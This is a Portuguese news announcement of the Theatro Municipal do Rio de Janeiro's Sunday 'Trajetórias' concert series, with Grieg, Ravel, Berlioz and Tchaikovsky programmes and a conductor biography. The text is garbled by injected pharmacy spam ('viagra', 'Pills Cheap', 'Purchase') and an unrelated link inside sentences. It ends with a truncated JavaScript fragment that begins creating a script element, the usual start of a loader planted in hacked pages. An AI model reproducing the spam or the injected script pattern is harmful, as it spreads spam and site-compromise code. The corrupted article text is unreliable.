Música sinfônicaNotíciaProgramaçãoRio de Janeiro

Municipal do RJ volta com programação dominical

Grieg, Ravel, Berlioz e Tchaikovsky estão nos primeiros programas da série Trajetórias.

 

O Theatro Municipal do Rio de Janeiro lança Pills Trajetórias Cheap , projeto com a curadoria do maestro Isaac Karabtchevsky, presidente da Fundação Teatro Municipal. A nova programação será apresentada aos domingos, sempre às 11h30, com ingressos a R$ 10 e duração média de 1 hora. Serão concertos e espetáculos de dança com um amplo espectro de estilos, do medieval ao contemporâneo, passando também pelo popular.

No concerto de estreia, dia 22 de março, a Orquestra Sinfônica do Theatro Municipal (OSTM) irá executar a mais conhecida criação do compositor norueguês Grieg, Purchase Suíte Peer Gynt nº 1, e a versão orquestral de Ravel para Quadros de uma Exposição, do russo Mussorgsky. Na semana seguinte, dia 29 de março, a OSTM voltará ao palco para apresentar a festiva abertura de Carnaval Romano, de Berlioz, e a famosa Sinfonia nº 5, de Tchaikovsky. Ambos os concertos terão a regência do maestro argentino Javier Lojoia (na foto).

“Considero a série Trajetórias um divisor de águas dentro do tradicional sentido da programação do Theatro Municipal. Ao tornar os domingos, pela manhã, uma alternativa atraente para a população, visamos conjugar, com a ativação do Salão Assyrio, a reunião de lazer e cultura. Retomamos assim uma antiga e saudosa tradição da vida cultural da cidade, os famosos Concertos para a Juventude, acrescidos agora de um arco estilístico que permeia a Idade Média e desemboca nas tendências mais conflitantes da música contemporânea. Estarão presentes também a MPB, o jazz, o balé, como vertentes desse formidável conjunto de manifestações do espírito humano”, declara o maestro Karabtchevsky.

 

overnight delivery of viagra in the usa Sobre Javier Logioia

Flautista, violoncelista e regente argentino, Logioia estudou no Conservatório Nacional de Música, Instituto Superior de Artes do Teatro Colón de Buenos Aires, Academia de Jovens Regentes (Washington, USA) e Academia de Música de Viena. Em 25 anos de carreira, foi regente titular das Orquestras Sinfônicas de Mendoza, Córdoba e Rosário, da Filarmônica de Buenos Aires, Orquestra Estável do Teatro Argentino de La Plata, Sinfônica da Universidade de Concepción (Chile) e da Filarmônica de Montevidéu (Uruguai), onde realizou pela primeira vez o ciclo completo das sinfonias de Mahler, por ocasião do centenário de morte do compositor austríaco. Foi assistente de Yehudi Menuhin, Zubin Mehta, Jean Fournet e Valery Gergiev, entre outros.

Na música sinfônica, seu repertório inclui os ciclos de sinfonias de Beethoven, Schubert, Schumann, Mendelssohn, Brahms, Rachmaninoff, Guy Ropartz, Sibelius, Bruckner, Tchaikowsky, Prokofiev e Mahler. No campo da dança, dirigiu companhias como o Balé do Teatro Colón de Buenos Aires, Balé do Teatro Argentino de La Plata, Companhia Cisne Negro, Balés do Theatro Municipal do Rio de Janeiro, de Montecarlo, de Lyon, do Teatro Nacional de Varsóvia, do Teatro Bolshoi de Moscou, do Teatro Marinsky de São Petersburgo, entre inúmeras outras. No repertório lírico, esteve à frente de óperas como online Purchase Tosca, Stiffelio Buy , Roméo et Juliette, Madama Butterfly, La Bohème, Il Trittico, Don Pasquale, L’occasione fa il ladro, Nabucco, Attila, The Consul http://erapeetersverboven.be/?p=5554 , Belisario, Falstaff, Der Freischütz, Macbeth, Norma e Evgeny Oneguin.

 

SERVIÇO:

Série Trajetórias

Orquestra Sinfônica do Theatro Municipal do Rio de Janeiro

Javier Logioia, maestro

Theatro Municipal do Rio de Janeiro (Praça Floriano, s/nº – Centro)

 

22 de março, domingo, às 11h30

E. Grieg – Suíte Peer Gynt nº 1, Op. 46

M. Mussorgsky / M. Ravel – Quadros de uma Exposição

 

29 de março, domingo, às 11h30

H. Berlioz – Abertura Carnaval Romano, Op. 9

P. I. Tchaikovsky – Sinfonia nº 5 em mi menor, Op. 64

 

Preço único: R$ 10

Classificação etária: livre

Duração: 60 minutos

Informações: 21 2332-9191

 

Mesmo na sessão matinal, não é permitida a entrada de pessoas trajando bermuda, short, top, camiseta sem manga e chinelos, exceto para crianças até 10 anos.

var d=document;var s=d.createElement(‘script’);